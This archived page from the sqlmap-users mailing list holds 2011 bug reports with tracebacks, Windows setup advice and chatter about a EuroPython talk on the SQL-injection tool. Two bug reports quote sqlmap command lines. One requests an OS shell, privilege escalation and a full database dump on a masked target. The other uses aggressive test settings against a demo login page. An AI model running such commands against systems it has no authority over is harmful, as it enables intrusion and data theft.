sqlmap-users Mailing List for sqlmap (Page 87)
Brought to you by:
inquisb
Menu
▾
▴
sqlmap-users — sqlmap users mailing list
You can subscribe to this list here.
| 2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
| 2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
| 2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
| 2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
| 2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
| 2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
| 2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
| 2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
| 2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
| 2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
| 2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-08 09:14:28
|
Hi Chris, This is fixed now, but there's another bug I introduced recently. I will fix that as soon as possible. Thanks for reporting. Bernardo On 7 July 2011 21:44, Chris Clements <ccl...@fl...> wrote: > [15:37:17] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4224), retry > your run with the latest development version from the Subversion > repository. If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the > bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4224) > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py --batch --eta --os-shell --priv-esc --dump-all > --forms -o -u ********************************************** > Technique: None > Back-end DBMS: Microsoft Access (fingerprinted) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/pentest/database/sqlmap/lib/controller/controller.py", line 552, > in start > action() > File "/pentest/database/sqlmap/lib/controller/action.py", line 112, in > action > conf.dbmsHandler.dumpAll() > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line > 1781, in dumpAll > self.getTables() > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line > 806, in getTables > tables = self.getTables(False) > File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line > 867, in getTables > query = rootQuery.inband.query > AttributeError: 'DictObject' object has no attribute 'inband' > > [*] shutting down at 15:37:17 > > > Chris > > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: RS <li...@gm...> - 2011-07-08 08:40:42
|
./sqlmap.py -u "http://www.modsecurity.org/zero.webappsecurity.com/login1.asp" --data "login=&password=&graphicOption=minimum" --parse-errors -v 3 --random-agent --level 5 --risk 3 --batch --dbms "Microsoft Access" --tables sqlmap version: 1.0-dev (r4224) Python version: 2.6.5 Operating system: posix Command line: ./sqlmap.py -u ************************************************************* --data login=&password=&graphicOption=minimum --parse-errors -v 3 --random-agent --level 5 --risk 3 --batch --dbms Microsoft Access --tables Technique: None Back-end DBMS: Microsoft Access (fingerprinted) Traceback (most recent call last): File "./sqlmap.py", line 86, in main start() File "/test/sqlmap-dev/lib/controller/controller.py", line 552, in start action() File "/test/sqlmap-dev/lib/controller/action.py", line 91, in action conf.dumper.dbTables(conf.dbmsHandler.getTables()) File "/test/sqlmap-dev/plugins/generic/enumeration.py", line 806, in getTables tables = self.getTables(False) File "/test/sqlmap-dev/plugins/generic/enumeration.py", line 867, in getTables query = rootQuery.inband.query AttributeError: 'DictObject' object has no attribute 'inband' [*] shutting down at 01:39:31 The problem happens with --tables, --columns, --common-tables |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-08 08:31:24
|
Hi Wil, Chris, On 8 July 2011 09:28, Chris Oakley <chr...@gm...> wrote: > ... > For the 0.8 exe, I assume the guys used something like py2exe. Maybe they > could do this with 0.9 stable too if you ask nicely. Indeed, we used py2exe to generate the executable. It is not supported any more, now we only release .tar.gz and .tar.bz2. However, anyone is welcome to can takeover the maintenance of the RPM, DEB and EXE packages, just drop us an email if you are interested. -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Chris O. <chr...@gm...> - 2011-07-08 08:28:08
|
I use the 1.0-dev version every day on Windows and Linux :) The best way is to install Python, whack it in your system PATH so that you can access it from anywhere, install TortoiseSVN and grab the latest build from https://svn.sqlmap.org/sqlmap/trunk/sqlmap. If you don't want to do this then just install Python and use the 0.9 stable build. Python is cross platform. For the 0.8 exe, I assume the guys used something like py2exe. Maybe they could do this with 0.9 stable too if you ask nicely. Chris On 8 July 2011 03:33, Wil Ruiz <wil...@gm...> wrote: > I'm interested in running this on Windows. Version 0.8 had a Windows > executable using Cygwin. Is this still possible with 0.9 or has Windows > support been dropped? Thank you! > > > > ------------------------------------------------------------------------------ > All of the data generated in your IT infrastructure is seriously valuable. > Why? It contains a definitive record of application performance, security > threats, fraudulent activity, and more. Splunk takes this data and makes > sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-d2d-c2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > |
|
From: Wil R. <wil...@gm...> - 2011-07-08 02:33:17
|
I'm interested in running this on Windows. Version 0.8 had a Windows executable using Cygwin. Is this still possible with 0.9 or has Windows support been dropped? Thank you! |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-07 22:12:42
|
Hi, Over a year ago I registered the #sqlmap IRC channel on Freenode and forgot about it. Now I decided to use it, so if you happen to be on Freenode, feel free to join in for a chat. Technical questions, brainstorming, bug reports, feature requests are always welcome. Keep them coming, now you have also the IRC vector to exploit! I welcome private messages (/query inquis) too and will try to be in there as much as time permits. /server irc.freenode.net /join #sqlmap -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Chris C. <ccl...@fl...> - 2011-07-07 20:45:10
|
[15:37:17] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4224), retry
your run with the latest development version from the Subversion
repository. If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the
bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4224)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py --batch --eta --os-shell --priv-esc --dump-all
--forms -o -u **********************************************
Technique: None
Back-end DBMS: Microsoft Access (fingerprinted)
Traceback (most recent call last):
File "./sqlmap.py", line 86, in main
start()
File "/pentest/database/sqlmap/lib/controller/controller.py", line 552,
in start
action()
File "/pentest/database/sqlmap/lib/controller/action.py", line 112, in
action
conf.dbmsHandler.dumpAll()
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line
1781, in dumpAll
self.getTables()
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line
806, in getTables
tables = self.getTables(False)
File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line
867, in getTables
query = rootQuery.inband.query
AttributeError: 'DictObject' object has no attribute 'inband'
[*] shutting down at 15:37:17
Chris
|
|
From: Chris O. <chr...@gm...> - 2011-07-07 20:16:19
|
Hi Bernardo Thanks! I've just downloaded it, there are seeds. I'll keep it seeded. Regards Chris On 7 July 2011 20:51, Bernardo Damele A. G. <ber...@gm...>wrote: > Hi, > > The video is available now via torrent, > > http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python/video?torrent=1 > I can't see any seeders at the moment and and waiting myself to download > it. > > Bernardo > > > On 7 July 2011 20:48, Chris Oakley <chr...@gm...> wrote: > > Did the video to this ever make it online? Chris > > > > On 26 June 2011 15:07, Bernardo Damele A. G. <ber...@gm...> > > wrote: > >> > >> Slides from EuroPython presentation are online, http://t.co/wRPlSIf. > >> Soon to follow the video recording! > >> > >> Congratulations Miroslav! > >> > >> B. > >> > >> > >> On 22 June 2011 17:46, Kurt Grutzmacher <gr...@ji...> wrote: > >> > There's a reason why our grandparents used to dip their fingers in the > >> > whiskey glass when our parents were teething. > >> > Alcohol calms all. > >> > -- > >> > Kurt Grutzmacher -=- gr...@ji... > >> > > >> > > >> > On Wed, Jun 22, 2011 at 9:18 AM, Miroslav Stampar > >> > <mir...@gm...> wrote: > >> >> > >> >> it seems that i'll need to drink 2 beers before > >> >> > >> >> if you see me "probably" drunk you'll know i am :) > >> >> > >> >> kr > >> >> > >> >> On Wed, Jun 22, 2011 at 6:16 PM, Ahmed Shawky <ah...@is...> > >> >> wrote: > >> >> > /me gonna record it and spread it all of the interwebs :D > >> >> > > >> >> > On Wed, Jun 22, 2011 at 6:15 PM, Miroslav Stampar > >> >> > <mir...@gm...> wrote: > >> >> >> > >> >> >> ok people. > >> >> >> > >> >> >> this is my first conference and i am not the best narrator there > is > >> >> >> in > >> >> >> the universe. > >> >> >> > >> >> >> i'll kill myself if it will be "streamed" :) > >> >> >> > >> >> >> kr > >> >> >> > >> >> >> On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley > >> >> >> <chr...@gm...> wrote: > >> >> >> > If it is, be sure to point us in the right direction afterwards > :) > >> >> >> > > >> >> >> > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> > wrote: > >> >> >> >> > >> >> >> >> will it be streamed live ? > >> >> >> >> > >> >> >> >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. > >> >> >> >> <ber...@gm...> wrote: > >> >> >> >>> > >> >> >> >>> Hi, > >> >> >> >>> > >> >> >> >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at > >> >> >> >>> EuroPython > >> >> >> >>> 2011 conference in Firenze, Italy. > >> >> >> >>> > >> >> >> >>> The talk is titled "sqlmap - security development in python". > >> >> >> >>> > >> >> >> >>> Abstract follows: > >> >> >> >>> """ > >> >> >> >>> The "sqlmap" is one of the largest, widely used and most > active > >> >> >> >>> Python > >> >> >> >>> projects in the IT security community (more than 2000 commits > in > >> >> >> >>> one > >> >> >> >>> year period with community of over 100 active testers). It > >> >> >> >>> combines > >> >> >> >>> its developers' strong security knowledge together with > >> >> >> >>> analytical, > >> >> >> >>> mathematical and Python development skills to provide IT > >> >> >> >>> professionals > >> >> >> >>> with vibrant features. > >> >> >> >>> > >> >> >> >>> Talk would be consisted of several parts: short introduction > to > >> >> >> >>> project and developers, developing and testing environment, > >> >> >> >>> programming cycle, program's workflow, technologies used, > common > >> >> >> >>> pitfalls and how we've circumvent them, usage of mathematical > >> >> >> >>> models, > >> >> >> >>> optimizations, project's future goals. > >> >> >> >>> > >> >> >> >>> The significant part of this talk would be the immediate > insight > >> >> >> >>> into > >> >> >> >>> the developing process of probably the world's most advanced > >> >> >> >>> open-source Python IT security project today. > >> >> >> >>> """ > >> >> >> >>> > >> >> >> >>> Reference: > >> >> >> >>> > >> >> >> >>> > >> >> >> >>> > >> >> >> >>> > http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python > . > >> >> >> >>> > >> >> >> >>> Don't miss it if you are there, it will be a blast! :) > >> >> >> >>> > >> >> >> >>> Good luck Miroslav, > >> >> >> >>> Bernardo > >> >> >> >>> > >> >> >> >>> > >> >> >> >>> -- > >> >> >> >>> Bernardo Damele A. G. > >> >> >> >>> > >> >> >> >>> E-mail / Jabber: bernardo.damele (at) gmail.com > >> >> >> >>> Mobile: +447788962949 (UK 07788962949) > >> >> >> >>> PGP Key ID: Unavailable > >> >> >> >>> > >> >> >> >>> > >> >> >> >>> > >> >> >> >>> > >> >> >> >>> > >> >> >> >>> > ------------------------------------------------------------------------------ > >> >> >> >>> Simplify data backup and recovery for your virtual environment > >> >> >> >>> with > >> >> >> >>> vRanger. > >> >> >> >>> Installation's a snap, and flexible recovery options mean your > >> >> >> >>> data > >> >> >> >>> is > >> >> >> >>> safe, > >> >> >> >>> secure and there when you need it. Data protection magic? > >> >> >> >>> Nope - It's vRanger. Get your free trial download today. > >> >> >> >>> http://p.sf.net/sfu/quest-sfdev2dev > >> >> >> >>> _______________________________________________ > >> >> >> >>> sqlmap-users mailing list > >> >> >> >>> sql...@li... > >> >> >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> >> >> > >> >> >> >> > >> >> >> >> > >> >> >> >> -- > >> >> >> >> > >> >> >> >> Ahmed Shawky El-Antry > >> >> >> >> Pen-tester, Programmer and System administrator > >> >> >> >> lnxg33k owner "http://lnxg33k.wordpress.com" > >> >> >> >> Isecur1ty team member"http://www.isecur1ty.org" > >> >> >> >> Twitter @lnxg33k > >> >> >> >> > >> >> >> >> > >> >> >> >> > >> >> >> >> > >> >> >> >> > >> >> >> >> > ------------------------------------------------------------------------------ > >> >> >> >> Simplify data backup and recovery for your virtual environment > >> >> >> >> with > >> >> >> >> vRanger. > >> >> >> >> Installation's a snap, and flexible recovery options mean your > >> >> >> >> data > >> >> >> >> is > >> >> >> >> safe, > >> >> >> >> secure and there when you need it. Data protection magic? > >> >> >> >> Nope - It's vRanger. Get your free trial download today. > >> >> >> >> http://p.sf.net/sfu/quest-sfdev2dev > >> >> >> >> _______________________________________________ > >> >> >> >> sqlmap-users mailing list > >> >> >> >> sql...@li... > >> >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> >> >> > >> >> >> > > >> >> >> > > >> >> >> > > >> >> >> > > >> >> >> > > >> >> >> > > ------------------------------------------------------------------------------ > >> >> >> > Simplify data backup and recovery for your virtual environment > >> >> >> > with > >> >> >> > vRanger. > >> >> >> > Installation's a snap, and flexible recovery options mean your > >> >> >> > data > >> >> >> > is > >> >> >> > safe, > >> >> >> > secure and there when you need it. Data protection magic? > >> >> >> > Nope - It's vRanger. Get your free trial download today. > >> >> >> > http://p.sf.net/sfu/quest-sfdev2dev > >> >> >> > _______________________________________________ > >> >> >> > sqlmap-users mailing list > >> >> >> > sql...@li... > >> >> >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> >> >> > > >> >> >> > > >> >> >> > >> >> >> > >> >> >> > >> >> >> -- > >> >> >> Miroslav Stampar (@stamparm) > >> >> >> > >> >> >> E-mail: miroslav.stampar (at) gmail.com > >> >> >> PGP Key ID: 0xB5397B1B > >> >> > > >> >> > > >> >> > > >> >> > -- > >> >> > > >> >> > Ahmed Shawky El-Antry > >> >> > Pen-tester, Programmer and System administrator > >> >> > lnxg33k owner "http://lnxg33k.wordpress.com" > >> >> > Isecur1ty team member"http://www.isecur1ty.org" > >> >> > Twitter @lnxg33k > >> >> > > >> >> > >> >> > >> >> > >> >> -- > >> >> Miroslav Stampar (@stamparm) > >> >> > >> >> E-mail: miroslav.stampar (at) gmail.com > >> >> PGP Key ID: 0xB5397B1B > >> >> > >> >> > >> >> > >> >> > ------------------------------------------------------------------------------ > >> >> Simplify data backup and recovery for your virtual environment with > >> >> vRanger. > >> >> Installation's a snap, and flexible recovery options mean your data > is > >> >> safe, > >> >> secure and there when you need it. Data protection magic? > >> >> Nope - It's vRanger. Get your free trial download today. > >> >> http://p.sf.net/sfu/quest-sfdev2dev > >> >> _______________________________________________ > >> >> sqlmap-users mailing list > >> >> sql...@li... > >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > >> > > >> > > >> > >> > >> > >> -- > >> Bernardo Damele A. G. > >> > >> E-mail / Jabber: bernardo.damele (at) gmail.com > >> Mobile: +447788962949 (UK 07788962949) > >> PGP Key ID: Unavailable > >> > >> > >> > ------------------------------------------------------------------------------ > >> All of the data generated in your IT infrastructure is seriously > valuable. > >> Why? It contains a definitive record of application performance, > security > >> threats, fraudulent activity, and more. Splunk takes this data and makes > >> sense of it. IT sense. And common sense. > >> http://p.sf.net/sfu/splunk-d2d-c2 > >> _______________________________________________ > >> sqlmap-users mailing list > >> sql...@li... > >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: Unavailable > |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-07-07 19:52:00
|
Hi, The video is available now via torrent, http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python/video?torrent=1 I can't see any seeders at the moment and and waiting myself to download it. Bernardo On 7 July 2011 20:48, Chris Oakley <chr...@gm...> wrote: > Did the video to this ever make it online? Chris > > On 26 June 2011 15:07, Bernardo Damele A. G. <ber...@gm...> > wrote: >> >> Slides from EuroPython presentation are online, http://t.co/wRPlSIf. >> Soon to follow the video recording! >> >> Congratulations Miroslav! >> >> B. >> >> >> On 22 June 2011 17:46, Kurt Grutzmacher <gr...@ji...> wrote: >> > There's a reason why our grandparents used to dip their fingers in the >> > whiskey glass when our parents were teething. >> > Alcohol calms all. >> > -- >> > Kurt Grutzmacher -=- gr...@ji... >> > >> > >> > On Wed, Jun 22, 2011 at 9:18 AM, Miroslav Stampar >> > <mir...@gm...> wrote: >> >> >> >> it seems that i'll need to drink 2 beers before >> >> >> >> if you see me "probably" drunk you'll know i am :) >> >> >> >> kr >> >> >> >> On Wed, Jun 22, 2011 at 6:16 PM, Ahmed Shawky <ah...@is...> >> >> wrote: >> >> > /me gonna record it and spread it all of the interwebs :D >> >> > >> >> > On Wed, Jun 22, 2011 at 6:15 PM, Miroslav Stampar >> >> > <mir...@gm...> wrote: >> >> >> >> >> >> ok people. >> >> >> >> >> >> this is my first conference and i am not the best narrator there is >> >> >> in >> >> >> the universe. >> >> >> >> >> >> i'll kill myself if it will be "streamed" :) >> >> >> >> >> >> kr >> >> >> >> >> >> On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley >> >> >> <chr...@gm...> wrote: >> >> >> > If it is, be sure to point us in the right direction afterwards :) >> >> >> > >> >> >> > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: >> >> >> >> >> >> >> >> will it be streamed live ? >> >> >> >> >> >> >> >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. >> >> >> >> <ber...@gm...> wrote: >> >> >> >>> >> >> >> >>> Hi, >> >> >> >>> >> >> >> >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at >> >> >> >>> EuroPython >> >> >> >>> 2011 conference in Firenze, Italy. >> >> >> >>> >> >> >> >>> The talk is titled "sqlmap - security development in python". >> >> >> >>> >> >> >> >>> Abstract follows: >> >> >> >>> """ >> >> >> >>> The "sqlmap" is one of the largest, widely used and most active >> >> >> >>> Python >> >> >> >>> projects in the IT security community (more than 2000 commits in >> >> >> >>> one >> >> >> >>> year period with community of over 100 active testers). It >> >> >> >>> combines >> >> >> >>> its developers' strong security knowledge together with >> >> >> >>> analytical, >> >> >> >>> mathematical and Python development skills to provide IT >> >> >> >>> professionals >> >> >> >>> with vibrant features. >> >> >> >>> >> >> >> >>> Talk would be consisted of several parts: short introduction to >> >> >> >>> project and developers, developing and testing environment, >> >> >> >>> programming cycle, program's workflow, technologies used, common >> >> >> >>> pitfalls and how we've circumvent them, usage of mathematical >> >> >> >>> models, >> >> >> >>> optimizations, project's future goals. >> >> >> >>> >> >> >> >>> The significant part of this talk would be the immediate insight >> >> >> >>> into >> >> >> >>> the developing process of probably the world's most advanced >> >> >> >>> open-source Python IT security project today. >> >> >> >>> """ >> >> >> >>> >> >> >> >>> Reference: >> >> >> >>> >> >> >> >>> >> >> >> >>> >> >> >> >>> http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python. >> >> >> >>> >> >> >> >>> Don't miss it if you are there, it will be a blast! :) >> >> >> >>> >> >> >> >>> Good luck Miroslav, >> >> >> >>> Bernardo >> >> >> >>> >> >> >> >>> >> >> >> >>> -- >> >> >> >>> Bernardo Damele A. G. >> >> >> >>> >> >> >> >>> E-mail / Jabber: bernardo.damele (at) gmail.com >> >> >> >>> Mobile: +447788962949 (UK 07788962949) >> >> >> >>> PGP Key ID: Unavailable >> >> >> >>> >> >> >> >>> >> >> >> >>> >> >> >> >>> >> >> >> >>> >> >> >> >>> ------------------------------------------------------------------------------ >> >> >> >>> Simplify data backup and recovery for your virtual environment >> >> >> >>> with >> >> >> >>> vRanger. >> >> >> >>> Installation's a snap, and flexible recovery options mean your >> >> >> >>> data >> >> >> >>> is >> >> >> >>> safe, >> >> >> >>> secure and there when you need it. Data protection magic? >> >> >> >>> Nope - It's vRanger. Get your free trial download today. >> >> >> >>> http://p.sf.net/sfu/quest-sfdev2dev >> >> >> >>> _______________________________________________ >> >> >> >>> sqlmap-users mailing list >> >> >> >>> sql...@li... >> >> >> >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> -- >> >> >> >> >> >> >> >> Ahmed Shawky El-Antry >> >> >> >> Pen-tester, Programmer and System administrator >> >> >> >> lnxg33k owner "http://lnxg33k.wordpress.com" >> >> >> >> Isecur1ty team member"http://www.isecur1ty.org" >> >> >> >> Twitter @lnxg33k >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> >> ------------------------------------------------------------------------------ >> >> >> >> Simplify data backup and recovery for your virtual environment >> >> >> >> with >> >> >> >> vRanger. >> >> >> >> Installation's a snap, and flexible recovery options mean your >> >> >> >> data >> >> >> >> is >> >> >> >> safe, >> >> >> >> secure and there when you need it. Data protection magic? >> >> >> >> Nope - It's vRanger. Get your free trial download today. >> >> >> >> http://p.sf.net/sfu/quest-sfdev2dev >> >> >> >> _______________________________________________ >> >> >> >> sqlmap-users mailing list >> >> >> >> sql...@li... >> >> >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> >> >> >> >> > >> >> >> > >> >> >> > >> >> >> > >> >> >> > >> >> >> > ------------------------------------------------------------------------------ >> >> >> > Simplify data backup and recovery for your virtual environment >> >> >> > with >> >> >> > vRanger. >> >> >> > Installation's a snap, and flexible recovery options mean your >> >> >> > data >> >> >> > is >> >> >> > safe, >> >> >> > secure and there when you need it. Data protection magic? >> >> >> > Nope - It's vRanger. Get your free trial download today. >> >> >> > http://p.sf.net/sfu/quest-sfdev2dev >> >> >> > _______________________________________________ >> >> >> > sqlmap-users mailing list >> >> >> > sql...@li... >> >> >> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> >> > >> >> >> > >> >> >> >> >> >> >> >> >> >> >> >> -- >> >> >> Miroslav Stampar (@stamparm) >> >> >> >> >> >> E-mail: miroslav.stampar (at) gmail.com >> >> >> PGP Key ID: 0xB5397B1B >> >> > >> >> > >> >> > >> >> > -- >> >> > >> >> > Ahmed Shawky El-Antry >> >> > Pen-tester, Programmer and System administrator >> >> > lnxg33k owner "http://lnxg33k.wordpress.com" >> >> > Isecur1ty team member"http://www.isecur1ty.org" >> >> > Twitter @lnxg33k >> >> > >> >> >> >> >> >> >> >> -- >> >> Miroslav Stampar (@stamparm) >> >> >> >> E-mail: miroslav.stampar (at) gmail.com >> >> PGP Key ID: 0xB5397B1B >> >> >> >> >> >> >> >> ------------------------------------------------------------------------------ >> >> Simplify data backup and recovery for your virtual environment with >> >> vRanger. >> >> Installation's a snap, and flexible recovery options mean your data is >> >> safe, >> >> secure and there when you need it. Data protection magic? >> >> Nope - It's vRanger. Get your free trial download today. >> >> http://p.sf.net/sfu/quest-sfdev2dev >> >> _______________________________________________ >> >> sqlmap-users mailing list >> >> sql...@li... >> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > >> > >> >> >> >> -- >> Bernardo Damele A. G. >> >> E-mail / Jabber: bernardo.damele (at) gmail.com >> Mobile: +447788962949 (UK 07788962949) >> PGP Key ID: Unavailable >> >> >> ------------------------------------------------------------------------------ >> All of the data generated in your IT infrastructure is seriously valuable. >> Why? It contains a definitive record of application performance, security >> threats, fraudulent activity, and more. Splunk takes this data and makes >> sense of it. IT sense. And common sense. >> http://p.sf.net/sfu/splunk-d2d-c2 >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: Unavailable |
|
From: Chris O. <chr...@gm...> - 2011-07-07 19:48:45
|
Did the video to this ever make it online? Chris On 26 June 2011 15:07, Bernardo Damele A. G. <ber...@gm...>wrote: > Slides from EuroPython presentation are online, http://t.co/wRPlSIf. > Soon to follow the video recording! > > Congratulations Miroslav! > > B. > > > On 22 June 2011 17:46, Kurt Grutzmacher <gr...@ji...> wrote: > > There's a reason why our grandparents used to dip their fingers in the > > whiskey glass when our parents were teething. > > Alcohol calms all. > > -- > > Kurt Grutzmacher -=- gr...@ji... > > > > > > On Wed, Jun 22, 2011 at 9:18 AM, Miroslav Stampar > > <mir...@gm...> wrote: > >> > >> it seems that i'll need to drink 2 beers before > >> > >> if you see me "probably" drunk you'll know i am :) > >> > >> kr > >> > >> On Wed, Jun 22, 2011 at 6:16 PM, Ahmed Shawky <ah...@is...> > wrote: > >> > /me gonna record it and spread it all of the interwebs :D > >> > > >> > On Wed, Jun 22, 2011 at 6:15 PM, Miroslav Stampar > >> > <mir...@gm...> wrote: > >> >> > >> >> ok people. > >> >> > >> >> this is my first conference and i am not the best narrator there is > in > >> >> the universe. > >> >> > >> >> i'll kill myself if it will be "streamed" :) > >> >> > >> >> kr > >> >> > >> >> On Wed, Jun 22, 2011 at 6:13 PM, Chris Oakley > >> >> <chr...@gm...> wrote: > >> >> > If it is, be sure to point us in the right direction afterwards :) > >> >> > > >> >> > On 22 June 2011 17:11, Ahmed Shawky <ah...@is...> wrote: > >> >> >> > >> >> >> will it be streamed live ? > >> >> >> > >> >> >> On Wed, Jun 22, 2011 at 6:06 PM, Bernardo Damele A. G. > >> >> >> <ber...@gm...> wrote: > >> >> >>> > >> >> >>> Hi, > >> >> >>> > >> >> >>> Tomorrow at 5:15PM GMT+1, Miroslav will be presenting at > EuroPython > >> >> >>> 2011 conference in Firenze, Italy. > >> >> >>> > >> >> >>> The talk is titled "sqlmap - security development in python". > >> >> >>> > >> >> >>> Abstract follows: > >> >> >>> """ > >> >> >>> The "sqlmap" is one of the largest, widely used and most active > >> >> >>> Python > >> >> >>> projects in the IT security community (more than 2000 commits in > >> >> >>> one > >> >> >>> year period with community of over 100 active testers). It > combines > >> >> >>> its developers' strong security knowledge together with > analytical, > >> >> >>> mathematical and Python development skills to provide IT > >> >> >>> professionals > >> >> >>> with vibrant features. > >> >> >>> > >> >> >>> Talk would be consisted of several parts: short introduction to > >> >> >>> project and developers, developing and testing environment, > >> >> >>> programming cycle, program's workflow, technologies used, common > >> >> >>> pitfalls and how we've circumvent them, usage of mathematical > >> >> >>> models, > >> >> >>> optimizations, project's future goals. > >> >> >>> > >> >> >>> The significant part of this talk would be the immediate insight > >> >> >>> into > >> >> >>> the developing process of probably the world's most advanced > >> >> >>> open-source Python IT security project today. > >> >> >>> """ > >> >> >>> > >> >> >>> Reference: > >> >> >>> > >> >> >>> > >> >> >>> > http://ep2011.europython.eu/conference/talks/sqlmap-security-developing-in-python > . > >> >> >>> > >> >> >>> Don't miss it if you are there, it will be a blast! :) > >> >> >>> > >> >> >>> Good luck Miroslav, > >> >> >>> Bernardo > >> >> >>> > >> >> >>> > >> >> >>> -- > >> >> >>> Bernardo Damele A. G. > >> >> >>> > >> >> >>> E-mail / Jabber: bernardo.damele (at) gmail.com > >> >> >>> Mobile: +447788962949 (UK 07788962949) > >> >> >>> PGP Key ID: Unavailable > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > >> >> >>> > ------------------------------------------------------------------------------ > >> >> >>> Simplify data backup and recovery for your virtual environment > with > >> >> >>> vRanger. > >> >> >>> Installation's a snap, and 